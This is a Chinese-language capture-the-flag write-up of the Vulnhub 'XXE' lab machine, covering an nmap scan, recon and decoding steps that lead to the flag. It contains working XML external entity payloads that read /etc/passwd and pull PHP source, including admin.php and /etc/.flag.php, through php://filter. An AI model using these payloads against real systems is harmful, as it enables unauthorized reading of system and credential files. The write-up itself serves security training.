1.主机发现
nmap -sS 192.168.74.1/24
- 就是192.168.74.158没错了,开放了80端口。
![Vulnhub-XXE靶机 Vulnhub-XXE靶机](/default/index/img?u=aHR0cHM6Ly9jaWppYW4wMC5naXRodWIuaW8vaW1nL1Z1bG5odWIvWFhFLzEucG5n)
2.前期信息收集
- 访问192.168.74.158,就是apache默认页。
![Vulnhub-XXE靶机 Vulnhub-XXE靶机](/default/index/img?u=aHR0cHM6Ly9jaWppYW4wMC5naXRodWIuaW8vaW1nL1Z1bG5odWIvWFhFLzIucG5n)
![Vulnhub-XXE靶机 Vulnhub-XXE靶机](/default/index/img?u=aHR0cHM6Ly9jaWppYW4wMC5naXRodWIuaW8vaW1nL1Z1bG5odWIvWFhFLzMucG5n)
- 访问robots.txt。存在/xxe/路径,admin.php。
![Vulnhub-XXE靶机 Vulnhub-XXE靶机](/default/index/img?u=aHR0cHM6Ly9jaWppYW4wMC5naXRodWIuaW8vaW1nL1Z1bG5odWIvWFhFLzQucG5n)
![Vulnhub-XXE靶机 Vulnhub-XXE靶机](/default/index/img?u=aHR0cHM6Ly9jaWppYW4wMC5naXRodWIuaW8vaW1nL1Z1bG5odWIvWFhFLzUucG5n)
- admin.php在/xxe/目录下。ip/xxe/admin.php同样是登录界面。
![Vulnhub-XXE靶机 Vulnhub-XXE靶机](/default/index/img?u=aHR0cHM6Ly9jaWppYW4wMC5naXRodWIuaW8vaW1nL1Z1bG5odWIvWFhFLzYucG5n)
3.靶机测试
POST /xxe/xxe.php HTTP/1.1
Host: 192.168.74.158
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.74.158/xxe/
Content-Type: text/plain;charset=UTF-8
Content-Length: 93
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>admin</name><password>123</password></root>
HTTP/1.1 200 OK
Date: Mon, 27 May 2019 05:43:44 GMT
Server: Apache/2.4.27 (Ubuntu)
Content-Length: 32
Connection: close
Content-Type: text/html; charset=UTF-8
Sorry, this admin not available!
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "file:///etc/passwd">
]>
<root><name>&admin;</name><password>1</password></root>
![Vulnhub-XXE靶机 Vulnhub-XXE靶机](/default/index/img?u=aHR0cHM6Ly9jaWppYW4wMC5naXRodWIuaW8vaW1nL1Z1bG5odWIvWFhFLzcucG5n)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
]>
<root><name>&admin;</name><password>1</password></root>
![Vulnhub-XXE靶机 Vulnhub-XXE靶机](/default/index/img?u=aHR0cHM6Ly9jaWppYW4wMC5naXRodWIuaW8vaW1nL1Z1bG5odWIvWFhFLzgucG5n)
- base64解密,源码分析,存在硬编码密码,登录密码用md5解密即可。
![Vulnhub-XXE靶机 Vulnhub-XXE靶机](/default/index/img?u=aHR0cHM6Ly9jaWppYW4wMC5naXRodWIuaW8vaW1nL1Z1bG5odWIvWFhFLzkucG5n)
![Vulnhub-XXE靶机 Vulnhub-XXE靶机](/default/index/img?u=aHR0cHM6Ly9jaWppYW4wMC5naXRodWIuaW8vaW1nL1Z1bG5odWIvWFhFLzEwLnBuZw==)
![Vulnhub-XXE靶机 Vulnhub-XXE靶机](/default/index/img?u=aHR0cHM6Ly9jaWppYW4wMC5naXRodWIuaW8vaW1nL1Z1bG5odWIvWFhFLzExLnBuZw==)
- 点击链接,跳转至/xxe/flagmeout.php。
- 显示是空白页,查看页面源代码。
![Vulnhub-XXE靶机 Vulnhub-XXE靶机](/default/index/img?u=aHR0cHM6Ly9jaWppYW4wMC5naXRodWIuaW8vaW1nL1Z1bG5odWIvWFhFLzEyLnBuZw==)
- 先进行base32解密,再进行base64解密。
- 可得/etc/.flag.php。
![Vulnhub-XXE靶机 Vulnhub-XXE靶机](/default/index/img?u=aHR0cHM6Ly9jaWppYW4wMC5naXRodWIuaW8vaW1nL1Z1bG5odWIvWFhFLzEzLnBuZw==)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php">
]>
<root><name>&admin;</name><password>1</password></root>
- base64解密之后看着像无特征码的PHP Webshell。
![Vulnhub-XXE靶机 Vulnhub-XXE靶机](/default/index/img?u=aHR0cHM6Ly9jaWppYW4wMC5naXRodWIuaW8vaW1nL1Z1bG5odWIvWFhFLzE0LnBuZw==)
- 保存至本地环境,命名为flag.php。前后分别添加上
<?php ?>
。
- 再访问flag.php可得flag。
![Vulnhub-XXE靶机 Vulnhub-XXE靶机](/default/index/img?u=aHR0cHM6Ly9jaWppYW4wMC5naXRodWIuaW8vaW1nL1Z1bG5odWIvWFhFLzE1LnBuZw==)